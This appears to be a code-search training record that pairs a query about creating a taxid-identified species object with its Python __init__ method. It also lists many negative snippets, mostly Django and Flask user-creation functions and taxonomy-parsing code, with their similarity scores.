self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password, username, **extra_fields):\n if not email:\n raise ValueError(_('Email is required.'))\n if not username:\n raise ValueError(_('Username is required.'))\n email = self.normalize_email(email)\n username = username\n user = self.model(email=email, username=username, **extra_fields)\n user.set_password(password)\n user.save()\n return user", "def create_user(self, email, password=None, **extra_fields):\n if not email:\n raise ValueError('Users must have an email address')\n\n user = self.model(email=self.normalize_email(email), **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n\n email = self.normalize_email(email)\n #username = self.model.normalize_username(username)\n user = self.model( email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None, **extra_fields):\n if not email:\n raise ValueError('Please enter a valid email address')\n\n user = self.model(email=email.lower(), **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n\n return user", "def _create_user(self,email,password,**extra_fields):\n\t\tif not email:\n\t\t\traise ValueError('The given email must be set')\n\n\t\ttry:\n\t\t\twith transaction.atomic():\n\t\t\t\tuser = self.model(email=email,**extra_fields)\n\t\t\t\tuser.set_password(password)\n\t\t\t\tuser.save(using=self._db)\n\t\t\t\treturn user\n\t\texcept:\n\t\t\traise", "def _create_user(self, username, email, password, **extra_fields):\n if not username:\n raise ValueError('Username is required.')\n if not email:\n raise ValueError('Email is required.')\n if not password:\n raise ValueError('Password is required.')\n try:\n with transaction.atomic():\n user = self.model(username=username, email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user\n except:\n raise", "def create_user(self, email, username, first_name, last_name, password):\n\n email = self.normalize_email(email)\n\n user = self.model(\n email=email,\n username=username,\n first_name=first_name,\n last_name=last_name\n )\n\n user.set_password(password)\n user.save(using=self._db)\n\n return user", "def create_user(self, email, password=None, **extrac_fields):\n\n if not email:\n raise ValueError(\"User must have email\")\n\n email = self.normalize_email(email)\n\n user = self.model(email=email, **extrac_fields)\n\n user.set_password(password)\n\n user.save(using=self._db)\n\n return user", "def _create_user(self, email, password, first_name, last_name, **extra_fields):\n now = timezone.now()\n email = self.normalize_email(email)\n user = self.model(email=email,\n first_name=first_name,\n last_name=last_name,\n is_active=True,\n last_login=now,\n date_joined=now, **extra_fields)\n\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None, **extra_fields):\n # Rasie an error if the email is empty\n if not email:\n raise ValueError('User must have an email address')\n # Make the email to be lower case for every new user\n user = self.model(email=self.normalize_email(email), **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n\n return user", "def _create_user(self, **fields):\n email = fields.pop('email')\n password = fields.get('password1')\n if not email:\n raise ValueError(\"Email address is required\")\n email = self.normalize_email(email)\n user = self.model(email=email, **fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, username, email, password, **other_fields):\n if not username or not email:\n raise ValueError(_('The email and username must be set.'))\n email = self.normalize_email(email)\n\n user = self.model(username=username, email=email, **other_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, name, password):\n\n if not email:\n raise ValueError(\"User must have an email address\")\n email = self.normalize_email(email)\n user = self.model(email=email)\n user.set_password(password)##encripts the password into HASH\n user.save(using=self._db)\n\n return user", "def _create_user(self, first_name, last_name, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n first_name = first_name\n last_name = self.last_name\n user = self.model(first_name, last_name,email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(email, password):\n\n user = User(email=email, password=password)\n \n db.session.add(user)\n db.session.commit()\n\n return user", "def _create_user(self, username, email, password, **extra_fields):\n if not username:\n raise ValueError('The given username must be set')\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n username = self.model.normalize_username(username)\n user = self.model(username=username, email=email, **extra_fields)\n user.password = make_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None):\n\t\tif not email:\n\t\t\traise ValueError(\"Users must have an email address.\")\n\t\tuser = self.model(\n\t\t\temail = self.normalize_email(email)\n\t\t)\n\t\tuser.set_password(password)\n\t\tuser.save(using=self._db)\n\t\treturn user", "def _create_user(self, username, name,\n email, password, **extra_fields):\n if not email:\n raise ValueError('Email field is required')\n email = self.normalize_email(email)\n user = self.model(\n username=username,\n name=name,\n email=email,\n **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, name, email, password):\n new_user = User(name=name, email=email, password=password)\n db.session.add(new_user)\n db.session.commit()", "def Create_user(self, email, name, password):\n\n #validating user inputs\n if not email:\n raise ValueError('Users must have email address')\n \n #normalize email (converting all to lowercase)\n email = self.normalize_email(email)\n #create a new user object\n user = self.model(email= email, name=name)\n\n #setting the password\n user.set_password(password)\n user.save(using = self._db) #using the same model created for the profile\n\n return user", "def register(cls, username, email, password):\n\n hashed_password = bcrypt.generate_password_hash(password).decode(\"UTF-8\")\n user = User(username=username, email=email, password=hashed_password)\n db.session.add(user)\n\n return user", "def create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError(_('The Email must be set'))\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n extra_fields.setdefault('is_active', True)\n user.save()\n return user", "def _create_user(self, first_name, last_name, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n now = timezone.now()\n email = self.normalize_email(email)\n user = self.model(\n email=email,\n first_name=first_name,\n last_name=last_name,\n is_active=True,\n is_activated=False,\n last_login=now,\n date_joined=now,\n **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None):\n if not email:\n raise ValueError('Users Must Have an email address')\n user = self.model(\n email=self.normalize_email(email),\n )\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password):\n if not email:\n raise ValueError('Users must have an email address')\n if not password:\n raise ValueError('Password is required')\n\n user = self.model(\n email=self.normalize_email(email),\n )\n\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, first_name, last_name, password=None):\n if not email:\n raise ValueError(_('Users must have an email address'))\n\n user = self.model(\n email=self.normalize_email(email),\n first_name=first_name,\n last_name=last_name\n )\n\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None):\n\n if not email:\n raise ValueError(\"Users must have an email address\")\n\n user = self.model(\n email=self.normalize_email(email))\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError(\"The given email must be set\")\n try:\n with transaction.atomic():\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.generate_activation_code()\n user.save(using=self._db)\n return user\n except:\n raise", "def create_user(self, username, email, password=None,commit=True):\n\n\n user = self.model(\n email=self.normalize_email(email),\n username = username\n )\n\n user.set_password(password)\n if commit:\n user.save(using=self._db)\n\n return user", "def create_user(self, email, first_name, last_name=None, password=None):\n if not email:\n raise ValueError('User must have an email-address')\n\n email = self.normalize_email(email)\n user = self.model(email=email, first_name=first_name, last_name=last_name)\n\n user.set_password(password)\n user.save(using=self._db)\n\n return user", "def _create_user(self, username, email, password, **extra_fields):\n if not username:\n raise ValueError('The given username must be set')\n email = self.normalize_email(email)\n username = self.model.normalize_username(username)\n user = self.model(username=username, email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None):\n if not email:\n raise ValueError('Users must have an email address')\n\n user = self.model(email=self.normalize_email(email))\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None):\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(email=self.normalize_email(email))\n user.set_password(password)\n user.save(using=self._db)\n\n return user", "def _create_user(self, username, email, password):\n\t\tnow = datetime.now()\n\t\tif username is None:\n\t\t\traise ValueError('Must include username')\n\t\tif email is None:\n\t\t\traise ValueError('Must include email')\n\t\temail = self.normalize_email(email)\n\t\tuser = self.model(\n\t\t\temail=self.normalize_email(email),\n\t\t\tusername=username,\n\t\t\tdate_joined=now\n\t\t)\n\t\tuser.set_password(password)\n\t\tuser.save(using=self._db)\n\t\treturn user", "def create_user(email='user@example.com', password='testpass123'):\n return get_user_model().objects.create_user(email=email, password=password)", "def _create_user(self, email, name, password, **extra_fields):\n if not email:\n raise ValueError('Users must have an email address')\n\n email = self.normalize_email(email)\n user = self.model(email=email, name=name, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n user.set_permissions(extra_fields.get('role'))\n return user", "def create_user(self, email, password=None):\n if not email:\n raise ValueError('Users must have an email address')\n\n user = self.model(\n email=self.normalize_email(email),\n )\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None):\n if not email:\n raise ValueError(\"Users must have an email address\")\n\n user = self.model(\n email=self.normalize_email(email),\n )\n\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None):\n if not email:\n raise ValueError('Users must have an email address')\n\n user = self.model(\n email=self.normalize_email(email),\n )\n\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None, **extra_fields):\n now = timezone.now()\n if not email:\n raise ValueError('The given email must be set')\n email = CBUserManager.normalize_email(email)\n user = self.model(email=email,\n is_staff=False, is_active=True, is_superuser=False,\n last_login=now, date_joined=now, **extra_fields)\n\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None, **extra_fields):\n now = timezone.now()\n if not email:\n raise ValueError('The given email must be set')\n email = CBUserManager.normalize_email(email)\n user = self.model(email=email,\n is_staff=False, is_active=True, is_superuser=False,\n last_login=now, date_joined=now, **extra_fields)\n\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(email, password):\n try:\n User(email=email, password=password)\n except IntegrityError:\n print('Error: Duplicate email address')", "def create_user(self, email, first_name, last_name, password=None):\n if not email:\n raise ValueError('User must have an email address')\n\n # normalizing email for standarization\n email = self.normalize_email(email) \n # creating user model that user manager is representing\n user = self.model(email=email, first_name=first_name, last_name=last_name)\n # Encrypting password using method of AbstractBaseUserClass\n user.set_password(password)\n # self._db to save to any database \n user.save(using=self._db)\n\n return user", "def create_user(self, email, name, password=None):\n try:\n email = self.normalize_email(email)\n user = self.model(email=email, name=name)\n user.set_password(password)\n # This saves the password as hash object\n user.save(using=self._db)\n # Since there can be many dbs in our app, the\n # best practice is to save the user in current db.\n return user\n except Exception as e:\n raise", "def create_user(self,email,password=None, **extra_fields):\n\n if not email: \n raise ValueError('Users must have an email address')\n #sets the email field of your user model, this is done on the model itself because there are no functions to change it.\n user = self.model(email=self.normalize_email(email), **extra_fields) \n user.set_password(password)\n user.save(using=self._db) #save using the defualt database in the settings.py file.\n\n return user", "def create_user(self, email, username, password=None):\n if not email:\n raise ValueError('Users must have an email address')\n if not username:\n raise ValueError('Users must have a username')\n \n user = self.model(email = self.normalize_email(email),\n username = username)\n \n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, username, password=None):\n if not email:\n raise ValueError('The given email must be set')\n if not username:\n raise ValueError('The given username must be set')\n \n user = self.model(email=self.normalize_email(email), username=username)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, username, email, password=None):\n\n if not username:\n raise ValueError('Users must have an username')\n if not email:\n raise ValueError('Users must have an email address')\n\n user = self.model(\n username=username,\n email=self.normalize_email(email),\n )\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_a_user(self, username='fry', email='fry@futur.ama', password='Qwerty!234'):\n user = User.objects.create_user(username, email, password)\n user.save()\n return user", "def create(cls, name, username, email, password):\n new_user = cls(name=name,\n username=username,\n email=email\n )\n new_user.password = bcrypt.generate_password_hash(\n password).decode('utf-8')\n\n db.session.add(new_user)\n db.session.commit()\n\n return new_user", "def create_user(self, email=None, name=None, password=None, phone=None):\n # if not email:\n # raise ValueError('Users must have an email address')\n\n user = self.model(\n email=email,\n name=name,\n phone=phone\n )\n\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_new_user(cls, user_email, user_password, user_phone):\n\n new_user = User(email=user_email, password=user_password, mobile_phone=user_phone)\n\n db.session.add(new_user)\n db.session.commit()\n\n print \"Successfully added new user with the email: %s\" % user_email", "def create_user(self, name, email, password):\n\t\tif not name:\n\t\t\traise ValueError('You forgot to enter a name!')\n\t\tif not email:\n\t\t\traise ValueError('You forgot to enter an email address!')\n\t\tif not password:\n\t\t\traise ValueError('You forgot to enter a password!')\n\t\ttry:\n\t\t\tvalidate_email(email)\n\t\texcept ValidationError:\n\t\t\traise ValueError('The email address entered is invalid.')\n\t\tif User.objects.filter(email=email).count() > 0:\n\t\t\traise ValueError('The email address entered is already registered.')\n\t\tif len(password) < 8:\n\t\t\traise ValueError('The password must be at least 8 characters.')\n\t\t\n\t\tuser = self.model(\n\t\t\tname=name,\n\t\t\temail=self.normalize_email(email),\n\t\t)\n\t\t\n\t\tuser.set_password(password)\n\t\tuser.save(using=self._db)\n\t\treturn user" ]
[ "0.84163386", "0.8407691", "0.8396383", "0.83900774", "0.83900774", "0.83900774", "0.83818454", "0.83800155", "0.83791924", "0.83788806", "0.83781564", "0.83751047", "0.83726776", "0.83633083", "0.83633083", "0.83633083", "0.8347122", "0.8345504", "0.8345504", "0.8345504", "0.8345504", "0.8345504", "0.8345504", "0.8345504", "0.8345504", "0.8334452", "0.83250177", "0.83218974", "0.83186316", "0.831837", "0.83115476", "0.83111054", "0.8309033", "0.8303709", "0.8302135", "0.8295237", "0.8281763", "0.82788795", "0.82738054", "0.82665956", "0.8256439", "0.82458824", "0.82306653", "0.82306653", "0.82306653", "0.82291484", "0.8223603", "0.822344", "0.82220304", "0.8218027", "0.8213622", "0.821293", "0.82121533", "0.8196599", "0.8183104", "0.8181538", "0.81753594", "0.81724024", "0.8167956", "0.8149421", "0.81391144", "0.813376", "0.813038", "0.812851", "0.8127302", "0.81178594", "0.8114436", "0.81122905", "0.81001174", "0.8080533", "0.80795807", "0.80789137", "0.8075503", "0.80712754", "0.8053893", "0.8049194", "0.80441505", "0.80298764", "0.8016008", "0.8014379", "0.80139726", "0.8011292", "0.79918736", "0.7989007", "0.79844564", "0.7980518", "0.7980518", "0.7978378", "0.79774547", "0.797169", "0.7970018", "0.79672307", "0.79640156", "0.79614455", "0.79570544", "0.7954799", "0.79524994", "0.7950434", "0.79418916" ]
0.8360308
17
creates a species identified by taxid and containing empty dictionnary of orthologs
def __init__(self, taxid, species_name = None, lineage=None): self.genes = dict() self.taxid = taxid self.species = species_name self.lineage = lineage
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def init_taxon():\n if not exists('./data/taxdmp.zip'):\n ftp = FTP('ftp.ncbi.nih.gov')\n ftp.login()\n ftp.cwd('pub/taxonomy')\n ftp.retrbinary('RETR taxdmp.zip', open('./data/taxdmp.zip', 'wb').write)\n ftp.quit\n with ZipFile('./data/taxdmp.zip', 'r') as dumpfile:\n dumpfile.extractall(path='./data/')\n taxon_id = dict()\n data = list()\n name = dict()\n specie = list()\n son = dict()\n greatson = dict()\n parent = dict()\n rank = dict()\n global taxon\n taxon = list()\n with open('./data/names.dmp', 'r') as dumpfile:\n raw = dumpfile.read().split(sep='\\n')\n raw.pop()\n for record in raw:\n add = record.replace('\\t', '').split(sep='|')\n if add[0] not in name or add[2] == 'scientific name':\n name[add[0]] = add[1]\n with open('./data/nodes.dmp', 'r') as dumpfile:\n raw = dumpfile.read().split(sep='\\n')\n raw.pop()\n for record in raw:\n add = record.replace('\\t', '').split(sep='|')\n # 1696063|Sarcocystis corvusi||scientific name|\n taxon_id[add[0]] = add[1]\n rank[add[0]] = add[3]\n if add[2] == 'species':\n specie.append(add[0])\n for specie in specie:\n record = [specie, ]\n while taxon_id[specie] != '1':\n record.append(taxon_id[specie])\n specie = taxon_id[specie]\n # if '33090' in record:\n # record.pop()\n # record.pop()\n data.append(record)\n for data in data:\n for n in range(len(data)):\n if data[n] not in parent:\n parent[data[n]] = data[(n + 1):]\n if n == 0:\n continue\n if data[n] not in son:\n son[data[n]] = {data[n - 1], }\n else:\n son[data[n]].add(data[n - 1])\n if data[n] not in greatson:\n greatson[data[n]] = {data[0], }\n else:\n greatson[data[n]].add(data[0])\n for specie in name.items():\n if specie[0] not in son:\n son[specie[0]] = set()\n if specie[0] not in parent:\n parent[specie[0]] = list()\n if specie[0] not in greatson:\n greatson[specie[0]] = set()\n record = [specie[0], name[specie[0]], rank[specie[0]], son[specie[0]], parent[specie[0]], greatson[specie[0]]]\n taxon.append(record)\n\n con = sqlite3.connect('./data/DB')\n cur = con.cursor()\n cur.execute(\n 'CREATE TABLE IF NOT EXISTS taxon (Id TEXT, Name TEXT, Rank TEXT, Son TEXT, Parent TEXT, GreatSon TEXT);')\n for line in taxon:\n son = ' '.join(line[3])\n parent = ' '.join(line[4])\n greatson = ' '.join(line[5])\n cur.execute('INSERT INTO taxon (Id, Name, Rank, Son, Parent, GreatSon) VALUES (?, ?, ?, ?, ?, ?);',\n (line[0], line[1], line[2], son, parent, greatson))\n con.commit()\n cur.close()\n con.close()\n print('Done.\\n')", "def writeTaxonomies( self ):\n\n self.logger.info( 'writeTaxonomies: START' )\n\n self.logger.info( 'writeTaxonomies: keggreader.getAllOrganisms(): START' )\n\n organisms = self.reader.getAllOrganisms()\n\n self.logger.info( 'writeTaxonomies: keggreader.getAllOrganisms(): DONE' )\n\n taxonomies = {} \n\n taxonomyFile = self.openInsertFile( 'taxonomiesInsert.psql' )\n\n self.logger.info( 'writeTaxonomies: We got ' + str(len(organisms)) + ' organisms and our insert file is taxonomiesInsert.psql' )\n\n\n for organism,taxonomyData in organisms.iteritems():\n for tax in taxonomyData['lineage']:\n\n taxonomies[ tax['name'] ] = { 'name': tax['name'], 'tax_id': tax['tax_id'], 'type': tax['type'] } \n\n\n self.logger.info( 'writeTaxonomies: We got ' + str(len(taxonomies)) + ' taxonomies.' )\n\n\n for taxonomy,taxData in taxonomies.iteritems():\n taxonomyInserted = self.writeFile( taxonomyFile, 'taxonomies', [ str(taxData['name']), str(taxData['tax_id']), str(taxData['type']) ] )\n self.taxonomiesInserted[ taxData['name'] ] = taxonomyInserted\n\n self.logger.info( 'writeTaxonomies: DONE' )", "def load_taxdict():\n tax = {}\n with open(\"../../data/taxonomy/tree_taxid.txt\", 'r') as file:\n for line in file:\n current_line = line.split() \n current_taxid = current_line[0]\n current_name = current_line[1]\n tax[current_taxid] = current_name \n\n return tax", "def add_taxonomy(tax_idx, pkl):\n for tax,v in tax_idx.items():\n for genome_id,genome_len in v.items():\n T = '|'.join(list(tax) + ['t__' + genome_id])\n pkl['taxonomy'][T] = ('', int(genome_len))\n return pkl", "def species_table(self):\n if self.hdf5_data is None:\n return None\n species_section = self.hdf5_data.get('/species', None)\n if species_section is None:\n return None\n return dict(\n (id, dict(name=name, radius=radius, D=D))\n for id, name, radius, D in species_section.value)", "def createTaxDict(taxFile):\n taxonomyDict = {}\n with open(taxFile, 'r') as f:\n for line in f:\n split = line.rstrip().split(\"\\t\")\n key = split[0]\n vals = split[1:]\n if \"Sendai virus\" in key:\n #print(key,flush=True)\n vals = [\"genus:Respirovirus\",\"family:Paramyxoviridae\",\"order:Mononegavirales\",\\\n \"class:Monjiviricetes\",\"phylum:Negarnaviricota\",\"resolution:genus\"]\n elif \"Bastrovirus\" in key:\n #print(key,flush=True)\n vals = [\"family:Astroviridae\",\"order:Stellavirales\",\"class:Stelpaviricetes\",\\\n \"phylum:Pisuviricota\",\"resolution:family\"]\n keyDict = {}\n for value in vals:\n splitVal = value.split(\":\")\n keyDict[splitVal[0]] = splitVal[1]\n taxonomyDict[key] = keyDict\n print(len(taxonomyDict))\n return taxonomyDict", "def summary(self,attr='raw'):\n g = {}\n g['gid'] = map(lambda x : x.gid, self.taxonomies)\n g['sp'] = map(lambda x : x.presences.species , self.taxonomies)\n \n g['gns'] = map(lambda x : x.presences.genera , self.taxonomies) \n g['fam'] = map(lambda x : x.presences.families , self.taxonomies)\n g['ord'] = map(lambda x : x.presences.orders , self.taxonomies)\n g['cls'] = map(lambda x : x.presences.classes , self.taxonomies)\n g['phy'] = map(lambda x : x.presences.phyla , self.taxonomies)\n g['kng'] = map(lambda x : x.presences.kingdoms , self.taxonomies)\n #g['all'] = map(lambda x : (x.gid,int(x.presences.species),int(x.genera),int(x.families),int(x.orders),int(x.classes),int(x.phyla),int(x.kingdoms)),self.taxonomies)\n keys = settings.TAXONOMIC_TREE_KEYS\n if attr == 'int':\n for key in keys:\n g[key] = map(lambda p : int(p) ,g[key])\n elif attr == 'str':\n for key in keys:\n g[key] = map(lambda p : str(p) ,g[key]) \n elif attr == 'list':\n for key in keys:\n g[key] = map(lambda p : p.list ,g[key]) \n elif attr == 'mapping':\n for key in keys:\n g[key] = map(lambda p : p.map ,g[key]) \n elif attr == 'raw':\n return g\n else:\n logger.error(\"Wrong attribute selection\")\n return None\n \n return g", "def writeOrganismTaxonomies( self ):\n\n self.logger.info( 'writeOrganismTaxonomies: START' )\n\n organisms = self.reader.getAllOrganisms()\n\n taxonomies = {} \n\n self.logger.info( 'writeOrganismTaxonomies: insert file will be organismTaxonomiesInsert.psql' )\n\n taxonomyFile = self.openInsertFile( 'organismTaxonomiesInsert.psql' )\n\n for organism,taxonomyData in organisms.iteritems():\n for tax in taxonomyData['lineage']:\n\n taxId = self.taxonomiesInserted[ tax['name'] ] \n organismId = self.importerOrganism.organismsInserted[ organism ] \n\n self.writeFile( taxonomyFile, 'organism_taxonomies', [ str(organismId), str(taxId) ] )\n\n\n self.logger.info( 'writeOrganismTaxonomies: DONE' )", "def get_full_tax(idx):\n logging.info('Compiling the taxonomy for all genomes...')\n tax_idx = collections.defaultdict(dict)\n for cluster_id,v in idx.items():\n for tax,vv in v.items():\n for genome_id,x in vv.items():\n tax_idx[tax][genome_id] = x['genome_len']\n n_genomes = 0\n for tax,v in tax_idx.items():\n n_genomes += len(v.keys())\n logging.info(' Total number of genomes: {}'.format(n_genomes))\n # return\n return tax_idx", "def make_homologues_mirnas(phylogenetic_tree, mirna_seqs):\n species = [leaf.taxon.label for leaf in phylogenetic_tree.leaf_iter()]\n mirhomologues = pd.DataFrame({sp: {mirid: mirna_seqs[mirid][:21]\n for mirid in mirna_seqs.keys()}\n for sp in species}).transpose()\n return mirhomologues", "def as_dict(self):\n species_dict = dict()\n species_dict['force_field'] = self.force_field\n species_dict['is_ts'] = self.is_ts\n if self.e_elect is not None:\n species_dict['e_elect'] = self.e_elect\n if self.e0 is not None:\n species_dict['e0'] = self.e0\n species_dict['arkane_file'] = self.arkane_file\n if self.yml_path is not None:\n species_dict['yml_path'] = self.yml_path\n if self.is_ts:\n species_dict['ts_methods'] = self.ts_methods\n species_dict['ts_guesses'] = [tsg.as_dict() for tsg in self.ts_guesses]\n species_dict['ts_conf_spawned'] = self.ts_conf_spawned\n species_dict['ts_number'] = self.ts_number\n species_dict['ts_report'] = self.ts_report\n species_dict['rxn_label'] = self.rxn_label\n species_dict['successful_methods'] = self.successful_methods\n species_dict['unsuccessful_methods'] = self.unsuccessful_methods\n species_dict['chosen_ts_method'] = self.chosen_ts_method\n species_dict['chosen_ts'] = self.chosen_ts\n if self.run_time is not None:\n species_dict['run_time'] = self.run_time.total_seconds()\n species_dict['t1'] = self.t1\n species_dict['label'] = self.label\n species_dict['long_thermo_description'] = self.long_thermo_description\n species_dict['multiplicity'] = self.multiplicity\n if self.number_of_radicals is not None:\n species_dict['number_of_radicals'] = self.number_of_radicals\n species_dict['charge'] = self.charge\n species_dict['generate_thermo'] = self.generate_thermo\n if self.opt_level is not None:\n species_dict['opt_level'] = self.opt_level\n if self.final_xyz is not None:\n species_dict['final_xyz'] = self.final_xyz\n species_dict['number_of_rotors'] = self.number_of_rotors\n species_dict['rotors_dict'] = self.rotors_dict\n species_dict['external_symmetry'] = self.external_symmetry\n species_dict['optical_isomers'] = self.optical_isomers\n species_dict['neg_freqs_trshed'] = self.neg_freqs_trshed\n if self.conf_is_isomorphic is not None:\n species_dict['conf_is_isomorphic'] = self.conf_is_isomorphic\n if self.bond_corrections is not None:\n species_dict['bond_corrections'] = self.bond_corrections\n if self.mol is not None:\n species_dict['mol'] = self.mol.toAdjacencyList()\n if self.initial_xyz is not None:\n species_dict['initial_xyz'] = self.initial_xyz\n if self.checkfile is not None:\n species_dict['checkfile'] = self.checkfile\n if self.most_stable_conformer is not None:\n species_dict['most_stable_conformer'] = self.most_stable_conformer\n if self.cheap_conformer is not None:\n species_dict['cheap_conformer'] = self.cheap_conformer\n if self.recent_md_conformer is not None:\n species_dict['recent_md_conformer'] = self.recent_md_conformer\n if self.svpfit_output_file is not None:\n species_dict['svpfit_output_file'] = self.svpfit_output_file\n if self._radius is not None:\n species_dict['radius'] = self._radius\n if self.conformers:\n species_dict['conformers'] = self.conformers\n species_dict['conformer_energies'] = self.conformer_energies\n if self.conformers_before_opt is not None:\n species_dict['conformers_before_opt'] = self.conformers_before_opt\n if self.bdes is not None:\n species_dict['bdes'] = self.bdes\n return species_dict", "def species_lookup_by_taxonid(self, taxon_id):\n return self.species_name_lookup(taxon_id)", "def parse_taxonomy( seq_id, lineage, key_dictionary ):\n\tif seq_id in sti_dict:\n\t\ttax_id = sti_dict[ seq_id ]\n\t\ttax_names = [ tax_id ] #list of taxon names\n\telse:\n\t\ttax_id = str( seq_id )\n\t\ttax_names = [ tax_id ] #list of taxon names\n\ttax_numbers = [ seq_id ]\n\tis_A_list = [] #store is_A relationships\n\n\twhile lineage != '1': #forces traversal through the tri file until we get to the root of taxonomy\n\t\t#print lineage\n\t\tif lineage == '0': #need this to process the root in the tri file. \n\t\t\tbreak\n\t\tis_A_list = [lineage] + is_A_list\n\t\ttax_numbers = [lineage] + tax_numbers\n\t\tif lineage in sti_dict: #we have the next taxonomic representative in the sti file\n\t\t\ttax_id = sti_dict[ lineage ]\n\t\t\ttax_names = [tax_id] + tax_names #append tax_id to front of list\n\t\telse: #the taxon does not have a sequence representative. \n\t\t\ttax_id = str( lineage ) \n\t\t\ttax_names = [tax_id] + tax_names\n\t\t#now process to next lineage\n\t\tlineage = tri_dict[ lineage ] \n\n\n\ttax_names = ['root'] + tax_names #append tax_id to front of list\n\ttax_numbers = [lineage] + tax_numbers\n\tis_A_list = ['0'] + [lineage] + is_A_list\n\n\t#now append all of these reuslts to the final dictionary, which will be keyed \n\t#off of the tax_numbers list (unique IDs for each taxonomic level.\n\n\tfor i in xrange( len( tax_numbers ) ):\n\t\tid = tax_numbers[i]\n\t\tif id in key_dictionary:\n\t\t\tpass\n\t\telse:\n\t\t\tparent = is_A_list[i]\n\t\t\tlevel = i #taxonomic level (how far down in levels are we?)\n\t\t\tnames = process_names( tax_names[:i+1] )\n\t\t\tkey_dictionary[ id ] = [ parent, level, names ]\n\n\treturn( key_dictionary )", "def construct_taxonomy(termID_list, dih, dih_metric_name=\"invCL\", taxorg_method=\"NoCyc\", \n graph_init_threshold=0.01, verbose=True):\n assert dih_metric_name in [\"weeds_prec\", \"clarkeDE\", \"invCL\"]\n assert taxorg_method in [\"NoCyc\", \"DMST\"]\n\n # DIH\n weighted_edges = [] # (hyper, hypo, score)\n for termID_pair in tqdm(list(combinations(termID_list, r=2))):\n score = 2.0 * dih.predict(termID_pair[0], termID_pair[1], dih_metric_name)\n if score >= graph_init_threshold:\n weighted_edges.append([termID_pair[1], termID_pair[0], score])\n\n # reverse order testing\n score = 2.0 * dih.predict(termID_pair[1], termID_pair[0], dih_metric_name)\n if score >= graph_init_threshold:\n weighted_edges.append([termID_pair[0], termID_pair[1], score])\n\n # Taxonomy organization\n G = construct_graph(termID_list, weighted_edges)\n if verbose:\n print(\"Before Taxonomy Organization\")\n describe_graph(G)\n print(\"=\"*89)\n\n if taxorg_method == \"NoCyc\":\n T = NoCyc(G)\n elif taxorg_method == \"DMST\":\n T = DMST(G)\n\n if verbose:\n print(\"After Taxonomy Organization\")\n describe_graph(T)\n \n return T", "def genotype(rsid):\n if rsid[0] == 'I' or rsid[0] == 'i':\n return { 'error': 'Cannot find indicators, must use rs #s'}\n soup = BeautifulSoup(urllib.urlopen('http://snpedia.com/index.php/Special:Browse/' + rsid).read())\n trows = soup('table')[1].find_all('tr')\n if len(trows) < 2:\n return { 'error': 'That rsid does not have any data/does not exist.' }\n locations = getLocations(soup)\n genotypeData = getData(locations, soup)\n genotypeData['rsid'] = rsid\n return genotypeData", "def test_speciesCreation():\n \n sys = LVsystem.Ecosystem()\n sys.addSpecies('rabbit')\n sys.addSpecies('fox')\n sys.setInteraction('rabbit', 'fox', -1)\n sys.setInteraction('fox', 'rabbit', 1)\n sys.setInitialCond('rabbit', 10)\n sys.setInitialCond('fox', 5)\n sys.setGrowthRate('rabbit', 1)\n sys.setGrowthRate('fox', -1)\n sys.setCarrCap('rabbit', 10000)\n sys.setCarrCap('fox', 10000)\n sys.setChangeRate('rabbit', 10)\n sys.setChangeRate('fox', 20) \n \n assert len(sys.species_list) == 2\n assert sys.species_list == ['rabbit','fox']\n assert sys.intMatrix == {('rabbit','fox'):-1, ('fox','rabbit'):1}\n\n sys.removeSpecies('rabbit')\n sys.removeSpecies('fox')", "def create_taxonomy(dataset_name, attr, dataset=[]):\n #path = os.getcwd()\n\n path_in = os.getcwd()\n pattern = '^.*/thesis-data-anonymisation/'\n path_top = re.search(pattern, path_in).group(0)\n\n path = path_top +'data'\n\n if len(dataset_name) > 0:\n prefix = '../data/'+dataset_name+'/hierarchy_'\n else:\n prefix = '../data/hierarchy_'\n\n postfix = '.csv'\n\n try:\n file = open(path + '/' + prefix + attr + postfix, 'r')\n except FileNotFoundError:\n if len(dataset_name) > 0:\n prefix = '/data/'+dataset_name+'/hierarchy_'\n else:\n prefix = 